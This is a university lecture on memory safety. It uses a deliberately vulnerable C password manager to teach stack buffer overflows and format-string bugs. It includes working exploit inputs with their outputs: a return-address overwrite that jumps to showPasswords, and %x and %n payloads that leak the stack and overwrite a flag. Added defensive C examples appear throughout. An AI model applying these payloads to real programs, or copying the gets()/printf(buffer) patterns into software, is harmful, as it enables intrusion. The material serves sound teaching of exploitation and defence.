System Security 1 - Memory Safety
Information Security
Michael Schwarz
November 8, 2019
www.iaik.tugraz.at
Memory Safety www.tugraz.at
Memory safety - Wikipedia
Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities dealing with random-access memory (RAM) access, such as buffer overflows and dangling pointers.
1 Michael Schwarz — www.iaik.tugraz.at
Memory Safety - More Details
A program execution is memory safe if the following things do not occur:
• Access errors
  • Buffer overflow/over-read
  • Invalid pointer
  • Race condition
  • Use after free
• Uninitialized variables
  • Null pointer access
  • Uninitialized pointer access
• Memory leaks
  • Stack/heap overflow
  • Invalid free
  • Unwanted aliasing
Memory Safety Violation
Two types of memory safety violation
Spatial violation: memory access is out of object’s bounds
• buffer overflow
• out-of-bounds reads
• null pointer dereference
Temporal violation: memory access refers to an invalid object
• use after free
• double free
• use of uninitialized memory
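To make the two classes concrete, here is an added example (not code from the lecture): a toy allocation tracker that records objects in a table and classifies each access as in bounds, a spatial violation (outside the object, including null or wild pointers) or a temporal violation (the object was already freed), covering the overflow, null pointer, use-after-free and double-free cases from the lists above. The addresses and sizes are constructed; nothing touches real memory.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Toy allocation tracker (constructed model, not a real allocator): the "heap"
 * is a table of objects and addresses are plain numbers, so nothing here
 * touches real memory. Every access is classified the way the slide does. */
typedef enum { ACCESS_OK, VIOLATION_SPATIAL, VIOLATION_TEMPORAL } verdict;

typedef struct {
    uintptr_t base;  /* first byte of the object */
    size_t    size;  /* object length in bytes */
    bool      alive; /* false after free; the entry stays as a quarantine record */
} tracked_object;

#define MAX_OBJECTS 32
static tracked_object table[MAX_OBJECTS];
static size_t n_objects = 0;

void track_reset(void) { n_objects = 0; }

/* Record an allocation; returns its slot, or -1 if the table is full. */
int track_alloc(uintptr_t base, size_t size) {
    if (n_objects == MAX_OBJECTS || size == 0) return -1;
    table[n_objects] = (tracked_object){ base, size, true };
    return (int)n_objects++;
}

/* Record a free. Returns false for a double free (temporal: the object is
 * already invalid) or for an invalid free of a slot that was never allocated. */
bool track_free(int slot) {
    if (slot < 0 || (size_t)slot >= n_objects || !table[slot].alive) return false;
    table[slot].alive = false;
    return true;
}

/* Find the object whose range contains addr, live or quarantined as requested. */
static const tracked_object *find_object(uintptr_t addr, bool want_alive) {
    for (size_t i = 0; i < n_objects; i++) {
        const tracked_object *o = &table[i];
        if (o->alive == want_alive && addr >= o->base && addr - o->base < o->size)
            return o;
    }
    return NULL;
}

/* Is [addr, addr + len) entirely inside o? Written without computing addr + len
 * so the bounds check cannot itself wrap around. */
static bool within(const tracked_object *o, uintptr_t addr, size_t len) {
    return addr >= o->base && len <= o->size && addr - o->base <= o->size - len;
}

/* Classify an access of len bytes starting at addr. */
verdict check_access(uintptr_t addr, size_t len) {
    const tracked_object *o = find_object(addr, true);
    if (o != NULL)                 /* starts inside a live object ... */
        return within(o, addr, len) ? ACCESS_OK : VIOLATION_SPATIAL; /* ... but may run past it */
    if (find_object(addr, false) != NULL)
        return VIOLATION_TEMPORAL; /* starts inside a freed object: use after free */
    return VIOLATION_SPATIAL;      /* no object at all: null or wild pointer */
}

/* Scenario built from the slide's lists: in-bounds read, overflow, null
 * dereference, a valid free, use after free, double free.
 * Returns the number of violations detected (4 for this scenario). */
int demo_violations(void) {
    track_reset();
    int violations = 0;
    int a = track_alloc(0x1000, 16);                      /* constructed object A */
    track_alloc(0x2000, 8);                               /* an unrelated object  */
    violations += check_access(0x1000, 16) != ACCESS_OK;  /* in bounds            */
    violations += check_access(0x1008, 16) != ACCESS_OK;  /* 8 bytes past the end */
    violations += check_access(0x0, 4)     != ACCESS_OK;  /* null pointer access  */
    violations += !track_free(a);                         /* first free is valid  */
    violations += check_access(0x1000, 4)  != ACCESS_OK;  /* use after free       */
    violations += !track_free(a);                         /* double free          */
    return violations;
}

int main(void) {
    printf("violations detected: %d\n", demo_violations());
    return 0;
}
```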
Motivation
The more complex the programs, the more bugs
[Chart: memory corruption vulnerabilities per year (x-axis: Year, 2002 to 2016; y-axis: Memory Corruption Vulnerabilities, 0 to 800). Values as read from the chart labels, 2002 to 2016: 2, 2, 3, 2, 191, 95, 128, 188, 342, 351, 423, 366, 420, 749, 717.]
Source: http://www.cvedetails.com/vulnerabilities-by-types.php
Red Team vs Blue Team
• There are two views on memory safety:
  • Attackers try to violate memory safety
  • Defenders try to ensure memory safety
• Attackers and defenders are often seen as teams in a “security war game”
  • The Red Team tries to find security problems and mount attacks
  • The Blue Team tries to protect software and defend against attacks
Red Team vs Blue Team
• The Red Team are not (only) criminals, their work is essential for the Blue Team
• Blue Team develops defenses based on Red Team attacks
• Red Team breaks them again
→ More secure software and better defenses
• Ultimate goal: memory safe programs
Red Team aka Attacks
Attacks
What is an Exploit?
• What is an exploit?
  • “a software tool designed to take advantage of a flaw in a computer system” (Oxford)
  • “[...] cause unintended or unanticipated behavior to occur on computer software” (Wikipedia)
  • “If Achilles’ heel was his vulnerability in the Iliad, then Paris’s poison-tipped arrow was the exploit.” (Kaspersky)
→ Quite fuzzy
What is a “normal” program?
• Programs: machines solving a certain problem(?)
• Ideally, finite-state machines
• We don’t build such machines → general-purpose hardware emulating them
• Programs: emulators for finite-state machines
Footnote: Most of the following ideas are from Halvar Flake / Thomas Dullien
What is a “normal” program?
[Diagram: a door FSM with two states, 1 “opened” (entry action E: open door) and 2 “closed” (entry action E: close door), connected by the transitions “open” and “close”; legend: state, entry action, transition, transition condition.]
• Finite-state machines: states and transitions
• Input: changes state to different state
• Finite-state machine (FSM) solves your problem
• Many different ways to implement FSM
An Example: Simple Password Manager
[Flowchart: Read PIN → correct? → Yes: Show password list; No: Error message]
• Security properties for your FSM
• Security properties based on inputs and outputs
• e.g., it should be practically infeasible for an attacker to get the password list (output) if he does not know the PIN (input)
Finite-state machine states vs CPU states
• We have to write an emulator for our FSM
• CPU has a lot more states than our FSM
• Every FSM state is represented by one or more CPU states
• For example, reading the PIN requires multiple CPU states
→ Keyboard interrupts, reading keys, storing text in memory, ...
• Not every CPU state is represented in the FSM
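The password-manager FSM and the FSM-versus-CPU-state point above, as an added example (not the lecture's code): the three FSM states are emulated in C, and the "Read PIN" state alone is spread over one emulator step per key press, which needs extra state the FSM never had (a buffer and an index into it). The emulator keeps those extra states inside the FSM's state space by bounds-checking every key and treating over-long input as an explicit error rather than an overflow. The PIN 4711 and the key sequences are constructed sample values.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* FSM from the slide: Read PIN -> correct? -> Show password list / Error message. */
typedef enum { READ_PIN, SHOW_LIST, ERROR_MSG } fsm_state;

#define PIN_LEN 4                                   /* the FSM only knows "a PIN was read" */
static const char EXPECTED_PIN[PIN_LEN + 1] = "4711"; /* constructed sample PIN */

/* The emulator: one FSM state plus CPU-only state the FSM does not model. */
typedef struct {
    fsm_state state;           /* which FSM state the CPU currently represents */
    char      buf[PIN_LEN + 1]; /* emulator-only: keys received so far (zero padded) */
    size_t    len;             /* emulator-only: how many keys are in buf */
} emulator;

void emu_init(emulator *e) {
    memset(e, 0, sizeof *e);
    e->state = READ_PIN;
}

/* "correct?" of the FSM. Compares every position regardless of mismatches,
 * so the time taken does not reveal how many leading digits were right. */
static bool pin_correct(const emulator *e) {
    unsigned char diff = (unsigned char)(e->len != PIN_LEN);
    for (size_t i = 0; i < PIN_LEN; i++)
        diff |= (unsigned char)(e->buf[i] ^ EXPECTED_PIN[i]);
    return diff == 0;
}

/* One emulator step per key press. Each branch is either an FSM transition
 * from the slide or bookkeeping of CPU-only state that must stay inside the
 * buffer's bounds. Returns the FSM state after the step. */
fsm_state emu_step(emulator *e, char key) {
    switch (e->state) {
    case READ_PIN:
        if (key == '\n') {                      /* PIN complete: evaluate "correct?" */
            e->state = pin_correct(e) ? SHOW_LIST : ERROR_MSG;
        } else if (e->len < PIN_LEN) {          /* spatial safety: never write past buf */
            e->buf[e->len++] = key;
        } else {
            /* A fifth key has no transition in the FSM. Reject it explicitly
             * instead of letting the emulator leave the FSM's state space. */
            e->state = ERROR_MSG;
        }
        break;
    case SHOW_LIST:
    case ERROR_MSG:
        break;                                  /* terminal in the slide: input is ignored */
    }
    return e->state;
}

/* Feed a whole keystroke sequence to a fresh emulator; returns the final FSM state. */
fsm_state emu_run(const char *keys) {
    emulator e;
    emu_init(&e);
    fsm_state s = e.state;
    for (const char *k = keys; *k != '\0'; k++)
        s = emu_step(&e, *k);
    return s;
}

int main(void) {
    printf("correct PIN  -> %d (SHOW_LIST=%d)\n", emu_run("4711\n"), SHOW_LIST);
    printf("wrong PIN    -> %d (ERROR_MSG=%d)\n", emu_run("4712\n"), ERROR_MSG);
    printf("5 keys typed -> %d (ERROR_MSG=%d)\n", emu_run("47111\n"), ERROR_MSG);
    return 0;
}
```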
11 Michael Schwarz — www.iaik.tugraz.at
CPU states
3 cases for CPU states
• Sane state: a CPU state corresponding to an FSM state
• Transitory state: a CPU state during a transition, leading to a sane state
• Weird state: a CPU state which does not correspond to any FSM state
Example continued: A Simple Password Manager

The slides step through this code one transition at a time, annotating the CPU state and the FSM state it corresponds to: Transitory (-) → Sane (Read PIN) → Transitory (-) → Sane (correct?) → Transitory (-) → Sane (Show Password List).

#define _GNU_SOURCE   /* declares getline() and the deprecated gets() */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

uint32_t readPIN(void);
void showPasswords(void);

int main() {
  uint32_t pin, correct = 0;
  while(1) {
    pin = readPIN();
    if(pin * 2654435761u == 324783883u)   /* PIN check, arithmetic mod 2^32 */
      correct = 1;
    if(correct) {
      showPasswords();
      break;
    } else printf("\nWrong PIN!\n");
  }
  return 0;
}

uint32_t readPIN() {
  char buffer[16];
  printf("Enter PIN:\n");
  gets(buffer);                          /* unbounded read into a 16-byte buffer, as on the slides */
  if(getenv("DEBUG")) printf(buffer);    /* input used as the format string, as on the slides */
  return atoi(buffer);
}

void showPasswords() {
  FILE* stream;
  char* l = NULL;
  size_t len = 0;
  stream = fopen("passwords", "r");      /* the password list, one entry per line */
  if (stream == NULL) return;
  while(getline(&l, &len, stream) != -1)
    puts(l);
  free(l);
  fclose(stream);
}
The Weird State
• The CPU emulates the FSM
→ It should only ever be in a sane or transitory state
• How can the CPU enter a weird state?
• Programming mistakes
• Broken hardware (e.g., bit flips in memory)
• Hardware bugs (e.g., CPU bugs)
• ...
• The program does not know that it is in a weird state
Running in the Weird State
• The program continues executing
• Transitions might still be applied → on a weird state instead of a sane state
• Usually transforms one weird state into another weird state
• Weird machine, with many weird states
• We can "program" the weird machine to do something different than the original FSM
Programming the Weird Machine
• We write a program as code → it is translated into instructions executed by the CPU
• To program a device we have to generate instructions
Instructions as Program
• Get rid of the mindset that we require code for programming
• Applications accept input
• They do different things depending on the input
→ Input programs the application
• Fine if the input only leads from one sane state to another sane state
Instructions as Program in Weird States
• If the application is in a weird state and programmed using input...
• ...the attacker is controlling your computer
• An abstract definition of exploitation
Exploitation
Exploitation: a process starting in a sane state of an FSM
1. Setup: choose the right sane state which “allows” getting to a weird state
2. Instantiation: transition from the sane state to a weird state
3. Programming: program the weird machine with the goal of breaking the security properties of the FSM
Back to the Example: A Simple Password Manager
• We want to enter a weird state
• Can we find a bug in the program?
• Can we abuse it to enter a weird state?
• First hint of a bug when compiling:
pwdman.c:(.text+0x2e): warning: the ‘gets’ function is dangerous and should not be used.
→ Check the man page of gets
man gets

GETS(3)                    Linux Programmer's Manual                    GETS(3)

NAME
       gets - get a string from standard input (DEPRECATED)

SYNOPSIS
       #include <stdio.h>

       char *gets(char *s);

DESCRIPTION
       Never use this function.

       gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed (see BUGS below).

RETURN VALUE
       gets() returns s on success, and NULL on error or when end of file occurs while no characters have been read. However, given the lack of buffer overrun checking, there can be no guarantees that the function will even return.

ATTRIBUTES
       For an explanation of the terms used in this section, see attributes(7).

       ┌──────────┬───────────────┬─────────┐
       │Interface │ Attribute     │ Value   │
       ├──────────┼───────────────┼─────────┤
       │gets()    │ Thread safety │ MT-Safe │
       └──────────┴───────────────┴─────────┘

CONFORMING TO
       C89, C99, POSIX.1-2001.

       LSB deprecates gets(). POSIX.1-2008 marks gets() obsolescent. ISO C11 removes the specification of gets() from the C language, and since version 2.16, glibc header files don't expose the function declaration if the _ISOC11_SOURCE feature test macro is defined.

BUGS
       Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

       For more information, see CWE-242 (aka "Use of Inherently Dangerous Function") at http://cwe.mitre.org/data/definitions/242.html

SEE ALSO
       read(2), write(2), ferror(3), fgetc(3), fgets(3), fgetwc(3), fgetws(3), fopen(3), fread(3), fseek(3), getline
Where is the Bug?
• Code part where gets is used:
uint32_t readPIN() {
    char buffer[16];
    printf("Enter PIN:\n");
    gets(buffer);
    if(getenv("DEBUG")) printf(buffer);
    return atoi(buffer);
}
• The buffer array has space for 16 characters
• gets reads until a newline or EOF, without any bounds check...
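As an added example (my code, not the lecture's pwdman), a hardened replacement for readPIN: it bounds the read with fgets, rejects an overlong line instead of silently truncating it, validates the digits with strtoul instead of atoi, and echoes with a fixed format string. It reads from a FILE* so constructed input can be fed through fmemopen; the status enum and function names are my own.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Status codes for the hardened reader (names are my own, not from the slides). */
enum pin_status { PIN_OK = 0, PIN_EOF, PIN_TOO_LONG, PIN_NOT_NUMERIC };

/*
 * Hardened replacement for the slides' readPIN():
 *  - fgets(buffer, sizeof buffer, in) can never write past the 16-byte buffer;
 *    it stops after 15 characters or at the newline, whichever comes first.
 *  - If no newline arrived, the line was longer than the buffer: the rest of
 *    the line is drained and the input is rejected, not silently truncated.
 *  - strtoul() with an end pointer and range check replaces atoi(), which
 *    accepts "12abc" and has undefined behaviour on overflow.
 *  - The DEBUG echo uses a fixed "%s" format; printf(buffer) would hand the
 *    user's input to printf as the format string.
 */
enum pin_status read_pin_safe(FILE *in, uint32_t *pin)
{
    char buffer[16];

    if (fgets(buffer, sizeof buffer, in) == NULL)
        return PIN_EOF;

    char *nl = strchr(buffer, '\n');
    if (nl == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                                   /* discard the overlong rest */
        return PIN_TOO_LONG;                    /* at most 14 digits are accepted */
    }
    *nl = '\0';

    if (getenv("DEBUG"))
        printf("%s\n", buffer);

    /* Only an unsigned decimal number: strtoul alone would accept "-5" or " 7". */
    if (!isdigit((unsigned char)buffer[0]))
        return PIN_NOT_NUMERIC;
    errno = 0;
    char *end;
    unsigned long v = strtoul(buffer, &end, 10);
    if (*end != '\0' || errno == ERANGE || v > UINT32_MAX)
        return PIN_NOT_NUMERIC;

    *pin = (uint32_t)v;
    return PIN_OK;
}

/* Feed constructed text through the same code path (used by the checks below). */
enum pin_status read_pin_from_text(const char *text, uint32_t *pin)
{
    FILE *f = fmemopen((void *)text, strlen(text), "r");
    if (f == NULL)
        return PIN_EOF;
    enum pin_status s = read_pin_safe(f, pin);
    fclose(f);
    return s;
}

int main(void)
{
    uint32_t pin;
    enum pin_status s = read_pin_safe(stdin, &pin);
    if (s == PIN_OK)
        printf("PIN read: %u\n", (unsigned)pin);
    else
        printf("rejected (status %d)\n", (int)s);
    return s == PIN_OK ? 0 : 1;
}
```

The slide's 40-character input is rejected as PIN_TOO_LONG with the buffer untouched beyond its 16 bytes, and the program stays in a sane state.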
Trigger the Bug
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
[1] 7106 segmentation fault (core dumped) ./pwdman
pwdman[7486]: segfault at 31303938 ip 0000000031303938 sp 00000000ffffcdc0 error 14 in libc-2.23.so[f7de2000+1b0000]
We are in a Weird State!
• We crash the program
• Crashing → not a state in our FSM
→ Weird state due to a programming mistake
• #1: Why did we get into this weird state?
• #2: What is this weird state?
• #3: How can we program our weird machine to do something useful (instead of crashing)?
#1: The Why
• gets reads from the user until a newline or EOF
• Everything read is stored in an array
• Arrays have a defined size
• What if we write more data into the array than it can hold?
• We write into something else adjacent in memory
#1: The Why - Recap: Memory Layout
• What is next to the variable?
• It is a local variable, therefore it is on the stack
• Other local variables would be adjacent (none here)
• What else is on the stack?
#1: The Why - Recap: Stack
[Figure: stack layout, higher addresses at the top]
0x7FF...
    saved return address  ┐
    saved base pointer    │ last frame
    local variables       ┘
    saved return address  ┐
    saved base pointer    │ current frame
    local variables       ┘
    ...
0x000...
#1: The Way - Overwriting the Stack
uint32_t readPIN() {
    char buffer[16];
    printf("Enter PIN:\n");
    gets(buffer);
    if(getenv("DEBUG")) printf(buffer);
    return atoi(buffer);
}
[Figure: the stack frame of readPIN after the 40-character input, higher addresses at the top; each cell is one 32-bit word]
    ...
    saved return address (IP)  0x31303938   ← return, continue at 0x31303938
    saved base pointer (BP)    0x37363534
                               0x33323130
                               0x39383736
    buffer[12..15]             0x35343332
    buffer[8..11]              0x31303938
    buffer[4..7]               0x37363534
    buffer[0..3]               0x33323130
#2: The What
• We are somewhere (more specifically: at address 0x31303938)
• The CPU tries to execute code at this address
• Probably nothing is mapped at this address → page fault
• The operating system kills the application with a segmentation fault
• Weird state: the CPU trying to execute code at an invalid address
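An added example, mine rather than the lecture's, that turns the slide's arithmetic into a crash-triage check: given the kernel's `segfault at 31303938 ip 0000000031303938` line and the 40-character input, does the faulting instruction pointer consist of input bytes sitting exactly in the return-address slot? The frame layout (16-byte buffer, 8 unlabelled bytes, saved BP, saved IP; 32-bit little-endian x86) is read off the slide's diagram, and the function names are my own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout of readPIN() as drawn on the slide (32-bit, little-endian):
 * buffer[16], 8 unlabelled bytes, saved base pointer, saved return address.
 * Offsets are counted from buffer[0]. */
#define BUFFER_SIZE      16
#define UNLABELLED_BYTES  8
#define SAVED_BP_OFFSET  (BUFFER_SIZE + UNLABELLED_BYTES)   /* 24 */
#define SAVED_IP_OFFSET  (SAVED_BP_OFFSET + 4)              /* 28 */

/* The 32-bit little-endian word formed by input bytes off..off+3.
 * Sets *ok to 0 (and returns 0) when the input is too short to reach them. */
uint32_t word_at(const char *input, size_t off, int *ok)
{
    if (off + 4 > strlen(input)) {
        *ok = 0;
        return 0;
    }
    const unsigned char *p = (const unsigned char *)input + off;
    *ok = 1;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Render a word as the four ASCII bytes it was built from, lowest byte first. */
void word_to_ascii(uint32_t w, char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)((w >> (8 * i)) & 0xff);
    out[4] = '\0';
}

/* Every input offset whose 4 bytes would form fault_ip. A repeating pattern
 * such as "0123456789..." matches every 10 bytes, which is why the frame
 * layout (or a non-repeating pattern) is needed to say which copy hit the slot.
 * Stores up to max offsets in out and returns the total number of matches. */
size_t offsets_matching(const char *input, uint32_t fault_ip, size_t *out, size_t max)
{
    size_t count = 0, n = strlen(input);
    for (size_t off = 0; off + 4 <= n; off++) {
        int ok;
        if (word_at(input, off, &ok) == fault_ip && ok) {
            if (count < max)
                out[count] = off;
            count++;
        }
    }
    return count;
}

/* Triage verdict: the ip in the kernel log equals the input word at the
 * return-address slot, so the saved return address was overwritten with
 * input-controlled bytes rather than corrupted by some unrelated fault. */
int fault_ip_comes_from_input(const char *input, uint32_t fault_ip)
{
    int ok;
    uint32_t w = word_at(input, SAVED_IP_OFFSET, &ok);
    return ok && w == fault_ip;
}

int main(void)
{
    /* Constructed from the slide: the 40-character input and the logged ip. */
    const char *input = "0123456789012345678901234567890123456789";
    uint32_t fault_ip = 0x31303938u;
    char ascii[5];
    int ok;

    uint32_t bp = word_at(input, SAVED_BP_OFFSET, &ok);
    word_to_ascii(bp, ascii);
    printf("saved BP slot <- 0x%08x (\"%s\")\n", bp, ascii);
    word_to_ascii(fault_ip, ascii);
    printf("faulting ip 0x%08x is ASCII \"%s\"; from input: %s\n", fault_ip, ascii,
           fault_ip_comes_from_input(input, fault_ip) ? "yes" : "no");

    size_t offs[8];
    size_t n = offsets_matching(input, fault_ip, offs, 8);
    printf("%zu candidate offsets:", n);
    for (size_t i = 0; i < n && i < 8; i++)
        printf(" %zu", offs[i]);
    printf(" (frame layout says %d)\n", SAVED_IP_OFFSET);
    return 0;
}
```

The ip from the log decodes to the ASCII bytes "8901" and matches the input at offset 28, the return-address slot, while the saved BP slot at offset 24 holds 0x37363534, exactly as the slide's diagram shows.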
#3: The How
• Bring the CPU into a weird state by entering too many characters
• Control what the CPU executes by setting the instruction pointer
• We want to either
  • stay in a weird, but useful state, or
  • go to a (useful) sane state again
• Let’s try to get to the sane state “Show Password List” first...
#3: The How - Go to a useful sane state
• We can let the CPU execute code at an arbitrary location
• The showPasswords function is at some location
% readelf -s pwdman | grep showPasswords
64: 08048604 121 FUNC GLOBAL DEFAULT 14 showPasswords
• PIN should look like this: <padding>\x04\x86\x04\x08
• The padding fills the buffer (plus the saved base pointer); the address overwrites the saved instruction pointer
#3: The How - Break the Security Properties
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAA\x04\x86\x04\x08" | ./pwdman
Enter PIN:
root:toor
user:password1234
[1] 17074 segmentation fault (core dumped) ./pwdman
Summary
• We broke the security properties of the FSM
• Setup: We started in the sane state “Read PIN”
• Instantiation: Too many characters led to a weird state
• Programming: We “programmed” the weird state using the input to move to the sane state “Show Password List”
• We have successfully developed an exploit
Can we do more?
• Spatial memory safety violation to overwrite data → weird state
• Do we have to overwrite the saved instruction pointer?
• Other memory safety violations?
• Write in a more powerful “weird machine language”?
Do we have to overwrite the Instruction Pointer?
• No → it is just one “trick” to get into a weird state
• Controlling the control flow → weird state
• More ways to change the instruction pointer → function pointers, vtables, ...
• Controlling the instruction pointer is not a requirement
• Control-flow hijacking is a “category of tricks”
So, there is an alternative?
• Got rid of the mindset that we require code to program
• Input as a way of programming a device
• Modify data used in an FSM state (transition)
• Changing data to something not intended in the original FSM → weird state
• Assume the gets bug is fixed, e.g., gets replaced by fgets
The fixed Code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

uint32_t readPIN() {
  char buffer[16];
  printf("Enter PIN:\n");
  fgets(buffer, 16, stdin);            // bounded read: at most 15 bytes plus terminator, no overflow
  if(getenv("DEBUG")) printf(buffer);  // debug echo: user input is passed to printf as the format string
  return atoi(buffer);
}
An Example (still continued): Simple Password Manager
(same readPIN code as on the previous slide)
[FSM diagram: states Read PIN, Show PIN, PIN correct?, Show password list, Error message; transitions Yes / No]
• We ignored the “debug mode” before...
• One additional state in the FSM → echoes the input
• Security property stays the same
• It should be practically infeasible for an attacker to get the password list (output) if he does not know the PIN (input)
Another Compiler Warning with -Wformat-security
• Compile with all warnings enabled (-Wextra)
• Still a warning
pwdman1.c:9:32: warning: format not a string literal and no format arguments [-Wformat-security]
if(getenv("DEBUG")) printf(buffer);
                           ^
• What does the man page of printf say?
man 3 printf
Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.
Wait, what?
• printf can create a security hole?
• Why can printf write to memory?
• It is supposed to print text to the standard output...
Re-cap: Format Strings
• We remember how to use printf: printf("%d = 0x%x\n", 20, 20);
• Format string parameters (%d, %s, ...) convert function parameters to strings
• What if the number of format string parameters does not match the number of arguments?
• The function does not know
• Arguments are fetched from registers (first) and from the stack (afterwards)
Re-cap: Format Strings
• printf(user input); → the user input is the format string
• No parameters to the function
• Input does not contain a format string parameter → fine
• Format string parameter in the input → outputs a register value or a stack value
Trigger the Bug
% DEBUG=1 ./pwdman1
Enter PIN:
%x %x %x %x
10 f76b55a0 f76f5858 25207825
Wrong PIN!
Enter PIN:
• Weird state: printing values from memory is not in our FSM
• How can we “program” this weird state?
Format Strings - Data Manipulation
• A little-known format string parameter: %n
man 3 printf:
n The number of characters written so far is stored into the integer pointed to by the corresponding argument. That argument shall be an int *, or variant whose size matches the (optionally) supplied integer length modifier.
• Example:
int count;
printf("Some string %n\n", &count);
printf("Wrote %d characters\n", count);
Prints: Wrote 12 characters
Format Strings - Data Manipulation
• If there is an address on the stack, we can write to it
• The format string itself is on the stack → we can put any value onto the stack
• That value can be the address to write to
Playing around...
% echo "\x01\x02\x03\x04%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
10 f7f945a0 f7fd4858 4030201
Wrong PIN!
Enter PIN:
% echo "\xb8\xcd\xff\xff%x %x %x %x" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 ffffcdb8
Wrong PIN!
Enter PIN:
Programming the Weird State
% echo "\xb8\xcd\xff\xff%x %x %x %n" | \
DEBUG=1 ./pwdman1
Enter PIN:
? ? ? ? 10 f7f945a0 f7fd4858 root:toor
user:password1234
• With %n, we overwrote the correct variable at address 0xffffcdb8
• Programmed the weird machine using the input...
• ...to transition to the sane state “Show Password List”
More Memory Safety Violations
• There are many different memory safety violations
• All of them can get us into a weird state
• We have only seen 2 of them, but there are a lot more
• Memory safety violations are a “bag of tricks” from which we can take one to get into a weird state
More Powerful “Weird Programs”
• Our “weird machine programs” were quite simple
→ Jumped to a sane state of the FSM
• Instead:
  • Inject own code and jump to that
  • Jump into the middle of a sane state
  • ...
“Programming Languages” for the Weird Machine
For three decades
• people came up with tricks to get into weird states,
• and “programming languages” to program weird machines
Timeline (1985 to now):
• Morris Worm (1988)
• Stack Buffer Overflow (1996)
• Return-to-libc (1997)
• Ret2libc chaining (2001)
• Borrowed Code Chunks (2005)
• Return-oriented programming (2007)
• Blind ROP (2014)
• Rowhammer (2015)
That sounds interesting, I want to learn more!
• There are many techniques and cool tricks
• We did not look at them → it is more important to understand the concept
• Theory might be boring, but it helps in understanding the techniques
• Participate in a CTF and try it yourself
Fix all the things
• We got rid of gets
• We got rid of the format-string vulnerability
• We could not find any other bugs
• The FSM emulator (= our code) looks secure
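The %n behaviour from the “Data Manipulation” slide and the format-string fix referred to here, as an added C example that is not part of the lecture's pwdman1 code: it reproduces the count of 12, contrasts the bug (the untrusted string used as the format) with the hardened printf("%s", input) form, and adds a small scanner for conversion specifications as a check for any string that must reach a format argument. The names count_conversions, render_hardened and safe_as_format are chosen for this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* The slide's %n example: printf stores the number of characters written so
 * far into the int that the matching argument points to. The 12 characters of
 * "Some string " precede the %n, so count becomes 12. The format is a string
 * literal, which is the only legitimate place for %n. */
int chars_written_before_n(void) {
    int count = -1;
    printf("Some string %n\n", &count);
    return count;
}

/* Count the conversion specifications (%d, %x, %s, %n, ...) in s. "%%" is a
 * literal percent sign and is not counted. If has_n is non-NULL it is set to
 * true when a %n conversion is present: %n is the one conversion that writes
 * to memory instead of reading an argument, which is what turns the slide's
 * payload from an information leak into a write. Helper written for this
 * example, not part of pwdman1. */
int count_conversions(const char *s, bool *has_n) {
    int n = 0;
    if (has_n) *has_n = false;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%') continue;
        p++;                                  /* byte after the '%' */
        if (*p == '\0') break;                /* lone trailing '%' */
        if (*p == '%') continue;              /* "%%" prints a '%' */
        /* skip flags, width, precision, positional "$" and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.*$hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0') break;                /* truncated specification */
        if (*p == 'n' && has_n) *has_n = true;
        n++;
    }
    return n;
}

/* pwdman1's bug is printf(input): the untrusted input becomes the format and
 * every %x in it makes printf fetch a register or stack value. The hardened
 * form below passes the input as the argument of a fixed literal format, so
 * "%x %x %x %x" is printed as those eleven characters and nothing is fetched.
 * snprintf is used instead of printf so the result can be inspected.
 * (gcc -Wformat -Wformat-security reports the printf(input) pattern.) */
int render_hardened(char *out, size_t cap, const char *input) {
    return snprintf(out, cap, "%s", input);
}

/* For the rare case where a string that is not a literal must reach a
 * printf-family format argument (a message template, say): accept it only if
 * it contains no conversion at all, so it can be used with zero arguments. */
bool safe_as_format(const char *s) {
    return count_conversions(s, NULL) == 0;
}

/* Stand-alone demo on the slide's probe input. */
int main(void) {
    char buf[64];
    bool has_n = false;
    const char *probe = "%x %x %x %x";
    int n = count_conversions("%x %x %x %n", &has_n);
    printf("count after \"Some string \": %d\n", chars_written_before_n());
    printf("conversions in \"%%x %%x %%x %%n\": %d, writes memory: %s\n",
           n, has_n ? "yes" : "no");
    render_hardened(buf, sizeof buf, probe);
    printf("hardened output: %s\n", buf);
    printf("\"%s\" as a format: %s\n", probe,
           safe_as_format(probe) ? "accepted" : "rejected");
    return 0;
}
```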
Non-exploitable Code?
• Can we show that our code is now not exploitable?
• Not really → we would have to check every weird state for whether it is exploitable
• How do we know which weird states are reachable?
• Depends on the attacker model → what can an attacker do?
• Hard to think of attacker models that have not yet been discovered
Exploitation
• Who is interested in exploitation?
[Figure: Criminals, BP, Vendors, Governments]
Zero-Days for Piracy
• Jailbreaks (e.g., getting root) on various devices:
  • iOS (multiple exploits)
  • Wii (buffer overflow in The Legend of Zelda: Twilight Princess)
  • PS2 (buffer overflow in the BIOS)
  • PS3 (heap overflow)
  • Xbox (buffer overflow in savegames)
• Xbox (buffer overflow in savegames)
54 Michael Schwarz — www.iaik.tugraz.at
